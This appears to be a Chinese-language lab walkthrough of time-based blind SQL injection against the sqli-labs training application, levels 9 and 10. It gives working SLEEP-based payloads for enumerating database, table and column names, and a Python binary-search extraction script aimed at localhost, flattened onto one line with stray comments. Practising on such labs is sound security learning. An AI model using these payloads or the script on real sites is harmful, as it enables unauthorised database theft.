深圳网站建设者西安广告公司
目录
时间盲注(第九、十关)
1.判断
2.确认时间盲注
2.手工尝试时间盲注
数据库名长度
数据库名字符
表数
表名长度
表名字符
字段数
字段名长度
字段名字符
4.脚本时间盲注注入
5.第十关
时间盲注(第九、十关)
1.判断
当回显,报错显示,及布尔盲注都无法使用时,即无论怎么输入只有一个页面不会变化
2.确认时间盲注
使用的语法有:IF(condition, value_if_true, value_if_false)
测试是否存在时间盲注即闭合方式
单引号的时间盲注测试
?id=1' AND IF(1=1, SLEEP(5), 0) --+
发现页面会在加载中转圈圈3秒,说明有时间盲注,如果没有,则进行测试双引号时间盲注测试,一般不是单引号就是双引号,很少有单引号加括号,双引号加括号等等,这里测试是单引号闭合的时间盲注
?id=1" AND IF(1=1, SLEEP(5), 0) --+
2.手工尝试时间盲注
数据库名长度
注入数据库名,如果不对不会延时,正确则会延时
?id=1' and if(length(database())>4,sleep(5),1)--+
?id=1' and if(length(database())>8,sleep(5),1)--+
?id=1' and if(length(database())>6,sleep(5),1)--+
数据库名字符
?id=1'and if(ascii(substr((select database()),1,1))>80,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))>104,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))>116,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))=110,sleep(5),1)--+
?id=1'and if(ascii(substr((select database()),1,1))=114,sleep(5),1)--+
表数
?id=1'and if(((select count(*) from information_schema.tables where table_schema=database())>3),sleep(5),1)--+
?id=1'and if(((select count(*) from information_schema.tables where table_schema=database())>5),sleep(5),1)--+
表名长度
?id=1'and if(((select length(table_name) FROM information_schema.tables where table_schema=database() limit 1,1)>6),sleep(5),1)--+
?id=1'and if(((select length(table_name) FROM information_schema.tables where table_schema=database() limit 1,1)>8),sleep(5),1)--+
表名字符
?id=1'and if((ascii(substr((select table_name FROM information_schema.tables where table_schema=database() limit 0,1),1,1))>32),sleep(5),1)--+
字段数
?id=1'and if( ((select count(*) from information_schema.columns where table_schema= 'security' and table_name='users' )>2),sleep(5),1)--+
?id=1'and if( ((select count(*) from information_schema.columns where table_schema= 'security' and table_name='users' )>4),sleep(5),1)--+
字段名长度
?id=1'and if(((select length(column_name) from information_schema.columns where table_schema= 'security' and table_name='users' limit 1,1)>1),sleep(5),1)--+
字段名字符
?id=1'and if((ascii(substr((select column_name from information_schema.columns where table_schema= 'security' and table_name='users' limit 0,1),1,1))>32),sleep(5),1)--+
4.脚本时间盲注注入
import requests #用于发送HTTP请求
import time # 用于计算时间差url = "http://127.0.0.1/sqli-labs/Less-8/" # 目标注入点URLdef inject_database(url):name = '' # 初始化空字符串,存储最终数据库名for i in range(1, 100): # 遍历字符位置(假设数据库名最长99字符)low = 32 # ASCII可打印字符起始值(空格)high = 128 # ASCII结束值(DEL字符,实际只用到127)mid = (low + high) // 2 # 二分法初始中间值while low < high: # 二分查找当前字符的ASCII值# 构造Payload:通过时间盲注判断字符ASCII值是否大于midpayload = " 1' and ( if( ascii( substr( (select( database()) ),%d,1 ) )>%d,sleep(1),0 ) ) and ('1')=('1 " % (i, mid)/**" " 里面是构造的Payload1' 闭合前面的单引号if() 里面是判断字符的ASCII值是否大于mid ascii() 将字符转换为相应的ACSII值substr( (),%d,1) 获取()里面的字符集的第 %d 位开始的第一位字符,第一个%d(占位符)是代表iselect( database()) 查询获取当前的数据库名()>%d 第二个也就是这个%d是midsleep( ) 查询暂停指定的秒数。通常用于测试或故意造成延迟and ('1')=('1 闭合% (i, mid) 为 Python 的字符串格式化语法,将变量 i(字符位置)和 mid(猜测的 ASCII 值)动态插入 Payload,实现自动化枚*/params = {"id": payload} # 参数化请求#params 定义 HTTP GET 请求的 URL 参数,键值对形式传递数据#"id"目标网页接收的查询参数名(通常对应后端 SQL 查询的输入字段)start_time = time.time() # time.time() 记录请求时间戳 记录请求开始时间r = requests.get(url, params=params) # 发送HTTP GET请求/**base_url = "http://tieba.baidu.com/f?" params = {"kw": "兔子", "pn": 100} res = requests.get(base_url, params=params) print(res.url) # 输出:http://tieba.baidu.com/f?kw=兔子&pn=100:ml-citation{ref="1,3" data="citationList"} */end_time = time.time() # 记录请求结束时间# 判断响应时间是否超过1秒(触发sleep(1))if end_time - start_time > 1:low = mid + 1 # 当前字符ASCII值 > mid,调整下限else:high = mid # 当前字符ASCII值 <= mid,调整上限mid = (low + high) // 2 # 更新中间值# 当low >= high时,确定当前字符ASCII值为midif mid == 32: # 若mid为32(空格),终止循环breakname = name + chr(mid) # 将ASCII转为字符并拼接print(name) # 实时输出当前结果inject_database(url) # 执行注入函数
5.第十关
测试时间盲注的闭合方式
单引号的时间盲注测试
?id=1' AND IF(1=1, SLEEP(5), 0) --+
发现页面会在加载中转圈圈3秒,说明有时间盲注,如果没有,则进行测试双引号时间盲注测试,一般不是单引号就是双引号,很少有单引号加括号,双引号加括号等等
?id=1" AND IF(1=1, SLEEP(5), 0) --+
这里测试是双引号
剩下的步骤和第九关一样